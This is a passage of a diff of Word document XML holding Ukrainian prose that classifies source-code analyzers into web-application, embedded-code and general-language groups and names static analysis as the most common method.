+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>Аналізатори</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>вихідного</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>коду</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> - </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>клас</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>програмних</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>продуктів</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>створених</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>для</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>виявлення</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>і</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>запобігання</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>експлуатації</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>програмних</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve">помилок у вихідних кодах. Всі продукти, спрямовані на аналіз вихідного коду, можна умовно розділити на три типи: </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="0" w:firstLine="348"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>-</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Перша група </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>включає в</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> себе аналізатори коду веб-додатків і засоби щодо запобігання експлуатації вразливостей веб-сайтів. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="0" w:firstLine="348"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>-</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Друга група - аналізатори вбудованого коду, що дозволяють виявити проблемні місця в початкових текстах модулів, призначених для розширення функціональності корпоративних і виробничих систем. До таких модулів </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>в</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve">ідносяться програми для лінійки продуктів 1С, розширення CRM-систем, систем управління підприємством і систем SAP. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="0" w:firstLine="348"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>-</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Остання група призначена для аналізу вихідного коду на </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>р</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve">ізних мовах програмування, що не відносяться до бізнес-додатків і веб-додатків. Такі аналізатори призначені для замовників і розробників програмного забезпечення. У тому числі дана група аналізаторів застосовується для використання методології захищеної розробки програмних продуктів. Аналізатори </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>статичного</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> коду знаходять проблеми і потенційно вразливі місця в початкових кодах і видають рекомендації для їх усунення. Варто зазначити, що більшість з аналізаторів </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>в</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve">ідносяться до змішаних типів і виконують функції з аналізу широкого спектра програмних продуктів - веб-додатків, вбудованого коду і звичайного програмного забезпечення. Проте в даному огляді упор зроблений на застосування аналізаторів замовниками розробки, тому більша увага приділяється аналізатора веб-додатків і вбудованого коду. Аналізатори можуть містити </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>р</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve">ізні механізми аналізу, але найбільш поширеним і універсальним є статичний аналіз вихідного коду - </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:color w:val="2A2A2A"/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
         <w:lastRenderedPageBreak/>
-        <w:t>Класифікація</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>аналізаторів</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>вихідного</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>коду</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="0" w:firstLine="348"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>Аналізатори</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>вихідного</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>коду</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> - </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>клас</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>програмних</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>продуктів</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
